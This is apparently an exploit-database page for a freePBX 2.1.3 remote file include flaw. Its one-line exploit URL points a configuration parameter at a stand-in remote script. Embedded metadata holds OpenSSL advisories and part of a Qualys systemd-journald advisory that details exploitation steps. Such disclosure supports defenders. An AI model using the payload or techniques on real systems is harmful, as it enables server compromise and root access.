Search...

freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability

2006-10-28T00:00:00

ID 1337DAY-ID-1076
Type zdt
Reporter xoron
Modified 2006-10-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
=============================================================



Script: freePBX
Version: v2.1.3
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, [email protected], trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide



#  0day.today [2018-03-05]  #

JSON Vulners Source

Initial Source

{"hash": "0fde3cc344a0e37f88099a9ca8a4bcef40c34cb5d22a640a9254956171154808", "id": "1337DAY-ID-1076", "lastseen": "2018-03-05T21:35:26", "viewCount": 13, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "0d0263a0007c0d95394410d6dd276b12", "key": "href"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "modified"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3b38b72ec583e2eedac01234b17beef7", "key": "reporter"}, {"hash": "5e7c6b5921216ff71e574d665dcd16f2", "key": "sourceData"}, {"hash": "77f5b550685e062fbac2f15625babff4", "key": "sourceHref"}, {"hash": "748262351ce44af6094dc3dfc3491b03", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31916", "1337DAY-ID-30740", "1337DAY-ID-30736", "1337DAY-ID-30737", "1337DAY-ID-30735", "1337DAY-ID-30739", "1337DAY-ID-30738", "1337DAY-ID-30734", "1337DAY-ID-28680", "1337DAY-ID-28261"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL19157044.NASL", "ALA_ALAS-2013-199.NASL", "ORACLELINUX_ELSA-2013-0884.NASL", "REDHAT-RHSA-2013-0884.NASL"]}, {"type": "f5", "idList": ["SOL19157044"]}, {"type": "exploitdb", "idList": ["EDB-ID:37449", "EDB-ID:26887"]}, {"type": "cve", "idList": ["CVE-2013-1950"]}], "modified": "2018-03-05T21:35:26"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/1076", "description": "Exploit for unknown platform in category web applications", "title": "freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability", "history": [{"bulletin": {"hash": "a76445a70791c82f60ca6e3876c102d164defc742859e5fec6c684a169937f82", "id": "1337DAY-ID-1076", "lastseen": "2016-04-20T01:01:13", "enchantments": {"score": {"value": 5.1, "modified": "2016-04-20T01:01:13"}}, "hashmap": [{"hash": "c8e103225b245290d89a1a2ea0f2a67b", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "published"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "modified"}, {"hash": "3b38b72ec583e2eedac01234b17beef7", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "748262351ce44af6094dc3dfc3491b03", "key": "title"}, {"hash": "566cf6ed3dbd269df5804767fec39057", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "50af2a97c75e5d580214c71f33ec3d72", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/1076", "description": "Exploit for unknown platform in category web applications", "viewCount": 3, "title": "freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=============================================================\r\nfreePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\nScript: freePBX\r\nVersion: v2.1.3\r\nCode: require_once($amp_conf[\"AMPWEBROOT\"] . \"/admin/functions.inc.php\");\r\nExploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?\r\nFound: Cyber-Security\r\nThanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2006-10-28T00:00:00", "references": [], "reporter": "xoron", "modified": "2006-10-28T00:00:00", "href": "http://0day.today/exploit/description/1076"}, "lastseen": "2016-04-20T01:01:13", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=============================================================\r\nfreePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\nScript: freePBX\r\nVersion: v2.1.3\r\nCode: require_once($amp_conf[\"AMPWEBROOT\"] . \"/admin/functions.inc.php\");\r\nExploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?\r\nFound: Cyber-Security\r\nThanks: DJR, xoron, [email\u00a0protected], trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide\r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "published": "2006-10-28T00:00:00", "references": [], "reporter": "xoron", "modified": "2006-10-28T00:00:00", "href": "https://0day.today/exploit/description/1076"}

{"amazon": [{"lastseen": "2019-04-09T21:14:24", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA microprocessor side-channel vulnerability was found on SMT (e.g, Hyper-Threading) architectures. An attacker running a malicious process on the same core of the processor as the victim process can extract certain secret information. ([CVE-2018-5407 __](<https://access.redhat.com/security/cve/CVE-2018-5407>))\n\nIf an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable \"non-stitched\" ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). \n([CVE-2019-1559 __](<https://access.redhat.com/security/cve/CVE-2019-1559>))\n\n \n**Affected Packages:** \n\n\nopenssl\n\n \n**Issue Correction:** \nRun _yum update openssl_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssl-debuginfo-1.0.2k-16.150.amzn1.i686 \n openssl-1.0.2k-16.150.amzn1.i686 \n openssl-static-1.0.2k-16.150.amzn1.i686 \n openssl-devel-1.0.2k-16.150.amzn1.i686 \n openssl-perl-1.0.2k-16.150.amzn1.i686 \n \n src: \n openssl-1.0.2k-16.150.amzn1.src \n \n x86_64: \n openssl-1.0.2k-16.150.amzn1.x86_64 \n openssl-static-1.0.2k-16.150.amzn1.x86_64 \n openssl-devel-1.0.2k-16.150.amzn1.x86_64 \n openssl-debuginfo-1.0.2k-16.150.amzn1.x86_64 \n openssl-perl-1.0.2k-16.150.amzn1.x86_64 \n \n \n", "modified": "2019-04-09T16:10:00", "published": "2019-04-09T16:10:00", "id": "ALAS-2019-1188", "href": "https://alas.aws.amazon.com/ALAS-2019-1188.html", "title": "Medium: openssl", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "gentoo": [{"lastseen": "2019-03-14T05:50:17", "bulletinFamily": "unix", "description": "### Background\n\nOpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker to obtain sensitive information, caused by the failure to immediately close the TCP connection after the hosts encounter a zero-length record with valid padding. \n\nA local attacker could run a malicious process next to legitimate processes using the architecture\u2019s parallel thread running capabilities to leak encrypted data from the CPU\u2019s internal processes. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSL users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/openssl-1.0.2r\"", "modified": "2019-03-14T00:00:00", "published": "2019-03-14T00:00:00", "id": "GLSA-201903-10", "href": "https://security.gentoo.org/glsa/201903-10", "title": "OpenSSL: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2019-01-13T00:31:11", "bulletinFamily": "exploit", "description": "This is a thorough analysis of how Qualys approached exploiting three vulnerabilities in systemd-journald. Although they have not released formal exploits yet, they detail in here is useful in understanding the flaws.", "modified": "2019-01-11T00:00:00", "published": "2019-01-11T00:00:00", "id": "1337DAY-ID-31916", "href": "https://0day.today/exploit/description/31916", "title": "systemd-journald Memory Corruption / Information Leak Vulnerability", "type": "zdt", "sourceData": "Qualys Security Advisory\r\n\r\nSystem Down: A systemd-journald exploit\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nCVE-2018-16864\r\n- Analysis\r\n- Exploitation\r\nCVE-2018-16865\r\n- Analysis\r\n- Exploitation\r\nCVE-2018-16866\r\n- Analysis\r\n- Exploitation\r\nCombined Exploitation of CVE-2018-16865 and CVE-2018-16866\r\n- amd64 Exploitation\r\n- i386 Exploitation\r\nAcknowledgments\r\nTimeline\r\n\r\n Conversion, software version 7.0\r\n -- System of a Down, \"Toxicity\"\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nWe discovered three vulnerabilities in systemd-journald\r\n(https://en.wikipedia.org/wiki/Systemd):\r\n\r\n- CVE-2018-16864 and CVE-2018-16865, two memory corruptions\r\n (attacker-controlled alloca()s);\r\n\r\n- CVE-2018-16866, an information leak (an out-of-bounds read).\r\n\r\nCVE-2018-16864 was introduced in April 2013 (systemd v203) and became\r\nexploitable in February 2016 (systemd v230). We developed a proof of\r\nconcept for CVE-2018-16864 that gains eip control on i386.\r\n\r\nCVE-2018-16865 was introduced in December 2011 (systemd v38) and became\r\nexploitable in April 2013 (systemd v201). CVE-2018-16866 was introduced\r\nin June 2015 (systemd v221) and was inadvertently fixed in August 2018.\r\n\r\nWe developed an exploit for CVE-2018-16865 and CVE-2018-16866 that\r\nobtains a local root shell in 10 minutes on i386 and 70 minutes on\r\namd64, on average. We will publish our exploit in the near future.\r\n\r\nTo the best of our knowledge, all systemd-based Linux distributions are\r\nvulnerable, but SUSE Linux Enterprise 15, openSUSE Leap 15.0, and Fedora\r\n28 and 29 are not exploitable because their user space is compiled with\r\nGCC's -fstack-clash-protection.\r\n\r\nThis confirms https://grsecurity.net/an_ancient_kernel_hole_is_not_closed.php:\r\n\"It should be clear that kernel-only attempts to solve [the Stack Clash]\r\nwill necessarily always be incomplete, as the real issue lies in the\r\nlack of stack probing.\"\r\n\r\n\r\n========================================================================\r\nCVE-2018-16864\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n\r\n The waves all keep on crashing by\r\n -- System of a Down, \"Suggestions\"\r\n\r\nWe accidentally discovered CVE-2018-16864 while working on the exploit\r\nfor Mutagen Astronomy (CVE-2018-14634); if we pass several megabytes of\r\ncommand-line arguments to a program that calls syslog(), then journald\r\ncrashes:\r\n\r\nsystemd-journal[472]: segfault at 7ffe9a077420 ip 00007f45f6174877 sp 00007ffe9a0773f0 error 6 in systemd-journald[7f45f6169000+3f000]\r\n\r\n(gdb) disassemble 0x7f45f6174877 - 0x7f45f6169000\r\nDump of assembler code for function dispatch_message_real.4064:\r\n ...\r\n 0x000000000000b82c <+988>: callq 0x2bd10 <get_process_cmdline.constprop.96>\r\n 0x000000000000b831 <+993>: test %eax,%eax\r\n 0x000000000000b833 <+995>: js 0xb8ea <dispatch_message_real.4064+1178>\r\n 0x000000000000b839 <+1001>: mov -0x218(%rbp),%rbx\r\n 0x000000000000b840 <+1008>: test %rbx,%rbx\r\n 0x000000000000b843 <+1011>: je 0xd31b <dispatch_message_real.4064+7883>\r\n 0x000000000000b849 <+1017>: mov %rbx,%rdi\r\n 0x000000000000b84c <+1020>: callq 0x5360 <[email\u00a0protected]>\r\n 0x000000000000b851 <+1025>: add $0xa,%eax\r\n 0x000000000000b854 <+1028>: cltq\r\n 0x000000000000b856 <+1030>: add $0x1e,%rax\r\n 0x000000000000b85a <+1034>: and $0xfffffffffffffff0,%rax\r\n 0x000000000000b85e <+1038>: sub %rax,%rsp\r\n 0x000000000000b861 <+1041>: movabs $0x454e494c444d435f,%rax\r\n 0x000000000000b86b <+1051>: lea 0x37(%rsp),%r15\r\n 0x000000000000b870 <+1056>: and $0xfffffffffffffff0,%r15\r\n 0x000000000000b874 <+1060>: test %rbx,%rbx\r\n 0x000000000000b877 <+1063>: mov %rax,(%r15)\r\n 0x000000000000b87a <+1066>: mov $0x3d,%eax\r\n 0x000000000000b87f <+1071>: mov %ax,0x8(%r15)\r\n 0x000000000000b884 <+1076>: lea 0x9(%r15),%rax\r\n 0x000000000000b888 <+1080>: je 0xb895 <dispatch_message_real.4064+1093>\r\n 0x000000000000b88a <+1082>: mov %rbx,%rsi\r\n 0x000000000000b88d <+1085>: mov %rax,%rdi\r\n 0x000000000000b890 <+1088>: callq 0x5370 <[email\u00a0protected]>\r\n\r\n538 static void dispatch_message_real(\r\n...\r\n604 r = get_process_cmdline(ucred->pid, 0, false, &t);\r\n605 if (r >= 0) {\r\n606 x = strjoina(\"_CMDLINE=\", t);\r\n\r\n919 #define strjoina(a, ...) \\\r\n920 ({ \\\r\n921 const char *_appendees_[] = { a, __VA_ARGS__ }; \\\r\n922 char *_d_, *_p_; \\\r\n923 int _len_ = 0; \\\r\n924 unsigned _i_; \\\r\n925 for (_i_ = 0; _i_ < ELEMENTSOF(_appendees_) && _appendees_[_i_]; _i_++) \\\r\n926 _len_ += strlen(_appendees_[_i_]); \\\r\n927 _p_ = _d_ = alloca(_len_ + 1); \\\r\n928 for (_i_ = 0; _i_ < ELEMENTSOF(_appendees_) && _appendees_[_i_]; _i_++) \\\r\n929 _p_ = stpcpy(_p_, _appendees_[_i_]); \\\r\n930 *_p_ = 0; \\\r\n931 _d_; \\\r\n932 })\r\n\r\nThis vulnerability, an attacker-controlled alloca()\r\n(https://wiki.sei.cmu.edu/confluence/display/c/MEM05-C.+Avoid+large+stack+allocations)\r\nat instruction 0xb85e and line 927, was introduced in systemd v203:\r\n\r\ncommit ae018d9bc900d6355dea4af05119b49c67945184\r\nDate: Mon Apr 22 23:10:13 2013 -0300\r\n...\r\n r = get_process_cmdline(ucred->pid, 0, false, &t);\r\n if (r >= 0) {\r\n- cmdline = strappend(\"_CMDLINE=\", t);\r\n+ cmdline = strappenda(\"_CMDLINE=\", t);\r\n\r\n(strappenda() was renamed strjoina() in systemd v219) and became\r\nexploitable in systemd v230:\r\n\r\ncommit ac2e41f5103ce2c679089c4f8fb6be61d7caec07\r\nDate: Fri Feb 12 04:59:57 2016 -0800\r\n...\r\n This adds a wait flag to journal_file_set_offline(), when false the offline is\r\n performed asynchronously in a separate thread.\r\n\r\n------------------------------------------------------------------------\r\nExploitation\r\n------------------------------------------------------------------------\r\n\r\n ... it's the race\r\n Can you break out?\r\n -- System of a Down, \"36\"\r\n\r\nCVE-2018-16864 is similar to a Stack Clash vulnerability\r\n(https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt), but:\r\n\r\n- Steps 1 (Clash the stack with another memory region) and 2 (Run the\r\n stack pointer to the start of the stack) are not needed, because the\r\n attacker-controlled alloca() can be very large (several megabytes of\r\n command-line arguments); only Steps 3 (Jump over the stack guard page,\r\n into another memory region) and 4 (Smash the stack, or another memory\r\n region) are needed.\r\n\r\n- In Step 4 (Smash), the alloca() is fully written to (the vulnerability\r\n is essentially a stpcpy(alloca(strlen(cmdline) + 1), cmdline)), and\r\n the stpcpy() (a \"wild copy\") will therefore always crash into a\r\n read-only or unmapped memory region:\r\n\r\n https://googleprojectzero.blogspot.com/2015/03/taming-wild-copy-parallel-thread.html\r\n https://cansecwest.com/slides/2015/Taming%20wild%20copies%20-%20Chris%20evans.pdf\r\n\r\nWe tried to asynchronously interrupt this stpcpy() before it crashes,\r\nwith a signal or a timer, but we failed because journald uses signalfd()\r\nand timerfd_create() to handle these events synchronously.\r\n\r\nWe eventually gained control of eip (i386's instruction pointer) by\r\njumping into and smashing the stack of a concurrent thread (a \"Parallel\r\nThread Corruption\"):\r\n\r\n- First, we send a large, high-priority message (LOG_CRIT or higher) to\r\n journald, from a process whose cmdline is small; this message forces a\r\n large write() (between 1MB and 2MB) to /var/log/journal/ and forces\r\n the creation of a short-lived thread that fsync()s the journal (the\r\n stack of this thread is allocated in the mmap region).\r\n\r\n- Next, we create several processes (between 32 and 64) that write() and\r\n fsync() large files (between 1MB and 8MB) to /var/tmp/ (for example);\r\n these processes stall journald's fsync() thread and will allow us to\r\n win a tight race: exploit the \"wild copy\" before it crashes.\r\n\r\n- Last, we send a small, low-priority message to journald, from a\r\n process whose cmdline is very large (roughly 128MB, the distance\r\n between the main stack and the mmap region); this message forces a\r\n very large alloca() that jumps from journald's main stack into the\r\n stack of the fsync() thread, and smashes a saved eip before fsync()\r\n returns from kernel space.\r\n\r\nOn a Debian stable (9.5), our proof of concept wins this race and gains\r\neip control after a dozen tries (systemd automatically restarts journald\r\nafter each crash):\r\n\r\nsystemd-journal[2195]: segfault at 41414141 ip 41414141 sp b5f3d22c error 14\r\n\r\nDespite this initial success, we abandoned the exploitation of\r\nCVE-2018-16864: while working on our proof of concept, we discovered two\r\ndifferent vulnerabilities (CVE-2018-16865, another attacker-controlled\r\nalloca(), and CVE-2018-16866, an information leak) that are reliably\r\nexploitable on both i386 and amd64.\r\n\r\n\r\n========================================================================\r\nCVE-2018-16865\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n\r\n Can you feel their haunting presence?\r\n -- System of a Down, \"Holy Mountains\"\r\n\r\nSurprised by the heavy usage of alloca() in journald, we searched for\r\nanother attacker-controlled alloca() and found CVE-2018-16865:\r\n\r\n1963 int journal_file_append_entry(JournalFile *f, const dual_timestamp *ts, const struct iovec iovec[], unsigned n_iovec, uint64_t *seqnum, Object **ret, uint64_t *offset) {\r\n....\r\n1986 items = alloca(sizeof(EntryItem) * MAX(1u, n_iovec));\r\n1987\r\n1988 for (i = 0; i < n_iovec; i++) {\r\n1989 uint64_t p;\r\n1990 Object *o;\r\n1991\r\n1992 r = journal_file_append_data(f, iovec[i].iov_base, iovec[i].iov_len, &o, &p);\r\n1993 if (r < 0)\r\n1994 return r;\r\n1995\r\n1996 xor_hash ^= le64toh(o->data.hash);\r\n1997 items[i].object_offset = htole64(p);\r\n1998 items[i].hash = o->data.hash;\r\n1999 }\r\n\r\nThis vulnerability was introduced in systemd v38:\r\n\r\ncommit cf244689e9d1ab50082c9ddd0f3c4d1eb982badc\r\nDate: Thu Dec 29 15:00:57 2011 +0100\r\n...\r\n- items = new(EntryItem, n_iovec);\r\n- if (!items)\r\n- return -ENOMEM;\r\n+ items = alloca(sizeof(EntryItem) * n_iovec);\r\n\r\nand became exploitable in systemd v201:\r\n\r\ncommit c4aa09b06f835c91cea9e021df4c3605cff2318d\r\nDate: Mon Apr 8 20:32:03 2013 +0200\r\n...\r\n-#define ENTRY_SIZE_MAX (1024*1024*64)\r\n-#define DATA_SIZE_MAX (1024*1024*64)\r\n...\r\n+#define ENTRY_SIZE_MAX (1024*1024*768)\r\n+#define DATA_SIZE_MAX (1024*1024*768)\r\n\r\nIf we send a large \"native\" message to /run/systemd/journal/socket:\r\nsince the maximum size of a \"native\" entry is 768MB, and the minimum\r\nlength of a \"native\" item is 3 (\"A=\\n\"), and the size of an EntryItem\r\nstructure is 16 (a 64-bit offset and a 64-bit hash), the maximum size of\r\nthe attacker-controlled alloca() in journal_file_append_entry() is 768MB\r\n/ 3 * 16 = 4GB, large enough to jump from journald's main stack into the\r\nmmap region, even on amd64.\r\n\r\nOn amd64, as described in the \"64-bit exploitation\" of our Stack Clash\r\nadvisory, the randomized distance between the main stack and the mmap\r\nregion is shorter than 4GB with a probability of (approximately):\r\n\r\nSUM(d = 0; d < 4GB; d++) d / (16GB * 1TB) ~= 1 / 2048\r\n\r\n------------------------------------------------------------------------\r\nExploitation\r\n------------------------------------------------------------------------\r\n\r\n Jump (pogo, pogo, pogo, pogo, pogo, pogo, pogo)\r\n -- System of a Down, \"Bounce\"\r\n\r\nCVE-2018-16865 is basically a simplified Stack Clash vulnerability:\r\n\r\n- Steps 1 (Clash) and 2 (Run) of the Stack Clash are not needed, since\r\n the largest attacker-controlled alloca() is 4GB; only Steps 3 (Jump)\r\n and 4 (Smash) are needed.\r\n\r\n- In Step 4 (Smash), the alloca() is not necessarily fully written to:\r\n if the size of an item is larger than 128MB (DEFAULT_MAX_SIZE_UPPER),\r\n then journal_file_append_data() returns an error that breaks the \"for\"\r\n loop in journal_file_append_entry() (at lines 1992-1994) and avoids a\r\n crash into a read-only or unmapped memory region.\r\n\r\nWe eventually transformed this vulnerability into a crude\r\n\"write-what-where\" (https://cwe.mitre.org/data/definitions/123.html):\r\n\r\n- \"write-where\": We jump into and smash libc's read-write segment, and\r\n thereby overwrite a function pointer. Unfortunately this \"write-where\"\r\n is not surgical: the stack frames of the functions called from within\r\n the \"for\" loop (in journal_file_append_entry()) smash a few kilobytes\r\n below our target function pointer, and therefore overwrite vital libc\r\n variables that may crash or deadlock journald. Consequently, we must\r\n sometimes shift our alloca() jump slightly, to avoid overwriting such\r\n vital variables.\r\n\r\n- \"write-what\": We want to overwrite our target function pointer with\r\n the address of another function or ROP chain, but unfortunately the\r\n stack frames of the functions called from within the \"for\" loop (in\r\n journal_file_append_entry()) do not contain any data that we control.\r\n However, the 64-bit \"hash\" values that are written to the alloca()ted\r\n \"items\" are produced by jenkins_hashlittle2(), a noncryptographic hash\r\n function: we can easily find a short string (a preimage) that hashes\r\n to a given value (the address that will overwrite our target function\r\n pointer) and is also a valid_user_field() (or journal_field_valid()).\r\n\r\n This \"write-what\" restricts our \"write-where\" to function pointers\r\n whose address modulo 16 is equal to 8 (the offset of \"hash\" in the\r\n EntryItem structure).\r\n\r\nTo complete our exploit, we need the address of journald's stack pointer\r\nbefore the alloca() jump, and the address of our target function pointer\r\nin libc's read-write segment -- we need an information leak.\r\n\r\n\r\n========================================================================\r\nCVE-2018-16866\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n\r\n When they speak, we can peek from the windows of their mouths\r\n -- System of a Down, \"Know\"\r\n\r\nWe discovered an out-of-bounds read in journald (CVE-2018-16866), and\r\ntransformed it into an information leak:\r\n\r\n 31 #define WHITESPACE \" \\t\\n\\r\"\r\n...\r\n194 size_t syslog_parse_identifier(const char **buf, char **identifier, char **pid) {\r\n195 const char *p;\r\n...\r\n197 size_t l, e;\r\n...\r\n203 p = *buf;\r\n204\r\n205 p += strspn(p, WHITESPACE);\r\n206 l = strcspn(p, WHITESPACE);\r\n207\r\n208 if (l <= 0 ||\r\n209 p[l-1] != ':')\r\n210 return 0;\r\n211\r\n212 e = l;\r\n...\r\n240 if (strchr(WHITESPACE, p[e]))\r\n241 e++;\r\n242 *buf = p + e;\r\n243 return e;\r\n244 }\r\n\r\nIf we send a syslog message to journald (in *buf), and if the last\r\ncharacter of this message is a ':' (before the '\\0' terminator), then:\r\n\r\n- at line 240, p[e] is the '\\0' terminator of our message;\r\n\r\n- at line 240, strchr(WHITESPACE, p[e]) returns a pointer to the '\\0'\r\n terminator of the WHITESPACE string (as mentioned in man strchr: \"The\r\n terminating null byte is considered part of the string, so that if c\r\n is specified as '\\0', these functions return a pointer to the\r\n terminator.\");\r\n\r\n- at line 241, e is incremented;\r\n\r\n- at line 242, *buf points out-of-bounds, to the first character after\r\n the '\\0' terminator of our message;\r\n\r\n- later, the out-of-bounds string at *buf (supposedly the body of our\r\n syslog message) is written (leaked) to the journal.\r\n\r\nConsequently, we can read this out-of-bounds string:\r\n\r\n- either directly from the journal (if journald's \"Storage\" is\r\n \"persistent\", or \"auto\" and /var/log/journal/ exists), because\r\n journald supports extended file ACLs (Access Control Lists):\r\n\r\n $ id\r\n uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\n $ ls -l /var/log/journal/*/user-$UID.journal\r\n -rw-r-----+ 1 root systemd-journal 8388608 Nov 20 09:35 /var/log/journal/2562d1eced654f44a3d3a217d66b9ff3/user-1000.journal\r\n\r\n $ getfacl /var/log/journal/*/user-$UID.journal\r\n ...\r\n user:john:r--\r\n\r\n $ ./infoleak\r\n\r\n $ journalctl --all --user --lines=1 --identifier=infoleak | hexdump -C\r\n ...\r\n 00000050 2e 20 2d 2d 0a 4e 6f 76 20 32 30 20 31 36 3a 30 |. --.Nov 20 16:0|\r\n 00000060 30 3a 33 36 20 6c 6f 63 61 6c 68 6f 73 74 2e 6c |0:36 localhost.l|\r\n 00000070 6f 63 61 6c 64 6f 6d 61 69 6e 20 69 6e 66 6f 6c |ocaldomain infol|\r\n 00000080 65 61 6b 5b 33 35 34 38 5d 3a 20 78 fb 1e 78 54 |eak[3548]: x..xT|\r\n 00000090 7f 0a |..|\r\n\r\n- or (if journald's \"Storage\" is \"volatile\", or \"auto\" and\r\n /var/log/journal/ does not exist) from a tty that we recorded to\r\n /var/run/utmp, because journald writes (\"walls\") emergency messages\r\n (LOG_EMERG) to the tty of every logged-in user; our exploit records a\r\n tty to /var/run/utmp via an ssh connection to localhost, but other\r\n methods exist (for example, utempter and gnome-pty-helper):\r\n\r\n $ ./infoleak\r\n ...\r\n 00003510 0a 07 0d 0d 0a 42 72 6f 61 64 63 61 73 74 20 6d |.....Broadcast m|\r\n 00003520 65 73 73 61 67 65 20 66 72 6f 6d 20 73 79 73 74 |essage from syst|\r\n 00003530 65 6d 64 2d 6a 6f 75 72 6e 61 6c 64 40 6c 6f 63 |[email\u00a0protected]|\r\n 00003540 61 6c 68 6f 73 74 2e 6c 6f 63 61 6c 64 6f 6d 61 |alhost.localdoma|\r\n 00003550 69 6e 20 28 54 75 65 20 32 30 31 38 2d 31 31 2d |in (Tue 2018-11-|\r\n 00003560 32 30 20 31 36 3a 32 35 3a 34 36 20 43 53 54 29 |20 16:25:46 CST)|\r\n 00003570 3a 0d 0d 0a 0d 0d 0a 69 6e 66 6f 6c 65 61 6b 5b |:......infoleak[|\r\n 00003580 33 38 37 32 5d 3a 20 78 6b a2 e1 2f 7f 0d 0d 0a |3872]: xk../....|\r\n\r\nThis vulnerability was introduced in systemd v221:\r\n\r\ncommit ec5ff4445cca6a1d786b8da36cf6fe0acc0b94c8\r\nDate: Wed Jun 10 22:33:44 2015 -0700\r\n...\r\n- e += strspn(p + e, WHITESPACE);\r\n+ if (strchr(WHITESPACE, p[e]))\r\n+ e++;\r\n\r\nand was inadvertently fixed in August 2018:\r\n\r\ncommit a6aadf4ae0bae185dc4c414d492a4a781c80ffe5\r\nDate: Wed Aug 8 15:06:36 2018 +0900\r\n...\r\n- if (strchr(WHITESPACE, p[e]))\r\n- e++;\r\n+ e += strspn(p + e, WHITESPACE);\r\n\r\ncommit 8595102d3ddde6d25c282f965573a6de34ab4421\r\nDate: Fri Aug 10 11:07:54 2018 +0900\r\n...\r\n- e += strspn(p + e, WHITESPACE);\r\n+ /* Single space is used as separator */\r\n+ if (p[e] != '\\0' && strchr(WHITESPACE, p[e]))\r\n+ e++;\r\n\r\n------------------------------------------------------------------------\r\nExploitation\r\n------------------------------------------------------------------------\r\n\r\n For today we will take the body parts and put them on the wall\r\n -- System of a Down, \"Dreaming\"\r\n\r\nTo leak a stack address or an mmap address from journald:\r\n\r\n- First, we send a large native message to /run/systemd/journal/socket;\r\n journald mmap()s our message, and malloc()ates a large array of iovec\r\n structures: most of these structures point into our mmap()ed message,\r\n but some of them point to the stack (in dispatch_message_real()). The\r\n contents of this iovec array (especially the mmap and stack pointers)\r\n are preserved in a heap hole after free() (after journald finishes\r\n processing our message).\r\n\r\n- Next, we send a large syslog message to /run/systemd/journal/dev-log;\r\n to receive our large message (in server_process_datagram()), journald\r\n realloc()ates its server buffer into the heap hole that previously\r\n contained the iovec array (and still contains remains of mmap and\r\n stack pointers).\r\n\r\n- Last, we send a large syslog message that exploits CVE-2018-16866;\r\n journald receives our large message in its server buffer (in the heap\r\n chunk that previously contained the iovec array), and if we carefully\r\n choose the size of our message and position its terminating \":\" in\r\n front of a remaining mmap or stack pointer, then we can leak this\r\n pointer (it is mistakenly read out-of-bounds as the body of our\r\n message).\r\n\r\n>From this 